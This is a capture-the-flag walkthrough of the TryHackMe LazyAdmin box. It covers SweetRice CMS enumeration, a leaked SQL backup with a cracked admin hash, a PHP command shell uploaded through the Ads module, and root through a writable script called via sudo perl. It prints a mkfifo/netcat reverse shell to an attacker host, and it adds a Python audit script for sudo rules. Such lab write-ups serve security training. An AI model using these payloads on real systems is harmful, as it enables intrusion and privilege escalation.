SweetRice CMS Exploitation | LazyAdmin TryHackMe
ToxSec | A guide to the TryHackMe machine. Featuring CMS enumeration, database extraction, remote shell upload, and privilege escalation.
0x00 LazyAdmin: The Cost of Neglect
A lazy sysadmin is a goldmine. LazyAdmin proves it: breadcrumbs left behind turn into a straight line to root. This box is an exercise in classic exploitation — misconfigured CMS, exposed backups, poor upload validation, and a trivial Perl-to-root escalation.
If you’re sharpening OSCP instincts, this one delivers.
0x01 Ports Don’t Lie
Nmap Sweep
nmap -sC -sV -oN init-scan 10.10.80.64
Results:
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache 2.4.18
SSH and HTTP. Port 80 gets first look. Default Apache splash — no obvious clues.
0x02 Breadcrumbs in /content
Directory Brute-Force
gobuster dir -u http://10.10.80.64 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hit on:
/content/
Behind it: SweetRice CMS: a small, obscure platform with a reputation for weak patching and poor hygiene. Unlike WordPress or Drupal, it doesn’t get constant scrutiny, which means vulns often linger unpatched for years. Admins rarely upgrade it, backups sit in predictable paths, and default modules are left exposed. For hackers, that’s a perfect storm: forgotten software, weak defenses, and high-value leaks like database dumps or credential files just waiting to be pulled.
0x03 SQL Backups: Keys to the Kingdom
Searching Exploits
searchsploit sweetrice
SweetRice 1.5.1 → backup disclosure bug. Checked the common path:
http://10.10.80.64/content/inc/mysql_backup/
Found backup.sql wide open.
Extracting Creds
cat backup.sql | grep password
Hash pulled:
42f749ade7f9e195bf475f37a44cafcb
Cracked with CrackStation → password123.
Sidebar: CMS and Their Vulnerabilities
WordPress: endless plugins, constant upload/XXE/XSS flaws.
Joomla: extensions left to rot.
Drupal: “Drupalgeddon”-class RCEs.
SweetRice and niche CMS: unpatched bugs, thin docs, forgotten installs.
The pattern: CMS = skeletons. Enumerate versions, hunt backups, test uploads, and don’t skip the basics.
0x04 Foothold via CMS
Admin Panel
http://10.10.80.64/content/as/
Login:
manager : password123
Exploit Path
SearchSploit shows Exploit 40700 (Ads module file upload). Dropped a PHP shell:
<?php system($_GET['cmd']); ?>
Listener:
nc -nlvp 31337
Trigger:
http://10.10.80.64/content/attachment/reverse_shell.php
Shell landed as www-data.
0x05 Privilege Escalation
Upgrade Shell
python -c 'import pty; pty.spawn("/bin/bash")'
Sudo Check
sudo -l
Output:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Writable Payload
Inspect script:
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
Key: /etc/copy.sh was writable.
Injected reverse shell:
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i \
2>&1 | nc <attacker-ip> 5554 > /tmp/f' > /etc/copy.sh
Listener:
nc -nlvp 5554
Trigger escalation:
sudo /usr/bin/perl /home/itguy/backup.pl
Root shell confirmed:
whoami
root
cat /root/root.txt
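From the defensive side, the chain above (a NOPASSWD rule whose script hands control to a file anyone can edit) is easy to audit. The script below is an added example, not part of the original walkthrough: it takes a sudo -l rule line, follows any shebang scripts it names, and reports files with group- or world-write bits; the staged directory tree it builds is constructed for the demo and assumes the layout shown on this box.

```python
import os
import re
import stat
import tempfile

RULE_RE = re.compile(r"NOPASSWD:\s*(.+)$")
PATH_RE = re.compile(r"(/[\w./-]+)")  # absolute paths in a rule or script body

def writable_by_others(path: str) -> bool:
    """True if `path` is a regular file with a group- or world-write bit set."""
    if not os.path.isfile(path):
        return False
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rule(rule_line: str, root: str = "") -> list[str]:
    """Files reachable from a NOPASSWD rule (directly, or via scripts that call
    other scripts) that non-owners can edit. `root` prefixes every path so the
    check can run against a staged tree instead of the live filesystem."""
    m = RULE_RE.search(rule_line)
    queue = PATH_RE.findall(m.group(1)) if m else []
    findings, seen = [], set()
    while queue:
        rel = queue.pop()
        if rel in seen:
            continue
        seen.add(rel)
        path = root + rel
        if writable_by_others(path):
            findings.append(rel)
        # Follow references out of shebang scripts: this is how backup.pl
        # hands control to /etc/copy.sh on the box.
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                body = fh.read()
            if body.startswith("#!"):
                queue.extend(PATH_RE.findall(body))
    return sorted(findings)

def build_demo_tree(copy_mode: int = 0o777) -> str:
    """Stage a constructed copy of the box's layout under a temp directory."""
    root = tempfile.mkdtemp()
    os.makedirs(f"{root}/home/itguy")
    os.makedirs(f"{root}/etc")
    with open(f"{root}/home/itguy/backup.pl", "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n')
    os.chmod(f"{root}/home/itguy/backup.pl", 0o755)
    with open(f"{root}/etc/copy.sh", "w") as fh:
        fh.write("#!/bin/sh\necho backup\n")
    os.chmod(f"{root}/etc/copy.sh", copy_mode)  # 0o777 is the misconfiguration
    return root
```

Run audit_rule("(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl", build_demo_tree()) and the only finding is /etc/copy.sh; with copy_mode=0o755 the rule comes back clean.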
0x06 Debrief
LazyAdmin walked straight into compromise:
Recon: Nmap flagged SSH/HTTP.
Web enum: Gobuster revealed /content/ → SweetRice CMS.
Exposure: Backup SQL leaked DB creds.
Foothold: Ads module upload gave PHP shell.
Privesc: Writable script tied to Perl sudo call → root.
This wasn’t about advanced exploitation — it was about negligence. Exposed backups, weak creds, and privilege scripts pointing to writable files.
A perfect reminder: poor hygiene is just as exploitable as unpatched CVEs.
0x07 Command Recap
# Recon
nmap -sC -sV -oN init-scan 10.10.80.64
# Web Enum
gobuster dir -u http://10.10.80.64 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# CMS Exposure
searchsploit sweetrice
curl http://10.10.80.64/content/inc/mysql_backup/backup.sql
# Crack hash via CrackStation
# Login at /content/as/ with manager:password123
# Shell
# Upload PHP shell via Ads module
nc -nlvp 31337
# Priv-Esc
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
echo 'reverse shell payload' > /etc/copy.sh
nc -nlvp 5554
sudo /usr/bin/perl /home/itguy/backup.pl